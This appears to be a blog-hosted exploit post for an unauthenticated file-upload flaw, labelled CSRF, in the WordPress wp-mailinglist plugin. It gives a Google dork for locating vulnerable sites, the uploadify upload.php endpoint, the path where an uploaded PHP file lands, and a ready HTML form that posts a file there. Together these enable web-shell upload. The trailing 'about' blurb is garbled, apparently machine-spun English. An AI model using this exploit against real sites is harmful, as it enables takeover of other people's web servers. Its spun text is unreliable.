#################################################################################
# Exploit Title : Wordpress plugins wp-mailinglist upload File Vulnerability | CSRF
# Author : Fadi Tnx
# Google Dork : inurl:/wp-content/plugins/wp-mailinglist/
# Tested on : Linux
# data : 2017-09-21
# Blog : http://www.03day.ga
#################################################################################
#
#
# if msg : No file data was posted An existing vulnerability
#
# [!] Exploit : 127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php
#
# [!] File Location : http:/127.0.0.1/path/wp-content/uploads/wp-mailinglist/FILE_NAME.php
#################################################################################
#CSRF:
#################################################################################
<html>
<body>
<form action="127.0.0.1/path/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="upfile" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
#################################################################################
# ABOUT
# Facebook : https://www.facebook.com/Fallagahacker.Tn/
# forum : http://spyhackerz.com/forum/
# Blog : http://www.03day.ga/
#################################################################################
04day is AN formidable multimedia system effort supported in 2011 to look at however technology can modification life within the future for an enormous thought audience.
Our original editorial insight was that technology had migrated from the so much fringes of the culture to absolutely the center as mobile technology created a replacement generation of digital shoppers. Now, we tend to board a stunning world of screens that has ushered in revolutions in media, transportation, and science. The longer term is incoming quicker than ever.
04day is that the go-to supply for school, digital culture and diversion content for its dedicated and cogent audience around the globe
No comments:
Post a Comment